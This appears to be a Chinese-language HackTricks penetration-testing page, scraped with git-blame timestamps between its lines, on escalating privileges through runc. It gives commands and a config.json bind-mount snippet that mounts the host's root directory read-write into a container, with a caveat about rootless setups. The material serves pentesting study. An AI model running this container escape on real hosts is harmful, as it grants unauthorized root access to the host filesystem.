2024-01-06 23:17:33 +00:00
# RunC 权限提升
2022-04-28 16:01:33 +00:00
< details >
2024-01-06 23:17:33 +00:00
< summary > < strong > 从零开始学习 AWS 黑客技术,成为< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS 红队专家)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 23:17:33 +00:00
支持 HackTricks 的其他方式:
2022-04-28 16:01:33 +00:00
2024-01-06 23:17:33 +00:00
* 如果您希望在 **HackTricks 中看到您的公司广告** 或 **下载 HackTricks 的 PDF** ,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品** ](https://peass.creator-spring.com )
* 发现 [**PEASS 家族** ](https://opensea.io/collection/the-peass-family ),我们独家的 [**NFTs 集合** ](https://opensea.io/collection/the-peass-family )
* **加入** 💬 [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram 群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github 仓库提交 PR 来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2023-08-03 19:12:22 +00:00
## 基本信息
2021-01-03 00:43:09 +00:00
2024-01-06 23:17:33 +00:00
如果您想了解更多关于 **runc** 的信息,请查看以下页面:
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md ](../../network-services-pentesting/2375-pentesting-docker.md )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-01-03 00:43:09 +00:00
2022-05-01 13:25:53 +00:00
## PE
2021-01-03 00:43:09 +00:00
2024-01-06 23:17:33 +00:00
如果您发现宿主机中安装了 `runc` ,您可能能够**运行一个容器,挂载宿主机的根 / 目录**。
2021-01-03 00:43:09 +00:00
```bash
runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder
Inside the "mounts" section of the create config.json add the following lines:
{
2023-08-03 19:12:22 +00:00
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
2021-01-03 00:43:09 +00:00
},
#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs
# Finally, start the container
# The root folder is the one from the host
runc run demo
```
2021-03-10 17:43:53 +00:00
{% hint style="danger" %}
2024-01-06 23:17:33 +00:00
这并不总是有效的, 因为runc的默认操作是以root身份运行, 所以以非特权用户身份运行它根本无法工作( 除非你有一个rootless配置) 。将rootless配置设置为默认并不是一个好主意, 因为在rootless容器内部有很多限制在rootless容器外部不适用。
2021-03-10 17:43:53 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
< details >
2024-01-06 23:17:33 +00:00
< summary > < strong > 从零开始学习AWS黑客攻击直到成为专家, 通过< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > ! < / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-01-06 23:17:33 +00:00
其他支持HackTricks的方式:
2022-04-28 16:01:33 +00:00
2024-01-06 23:17:33 +00:00
* 如果你想在HackTricks上看到你的**公司广告**或者**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**telegram群组** ](https://t.me/peass ) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* **通过向** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) 和 [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github仓库提交PR来分享你的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >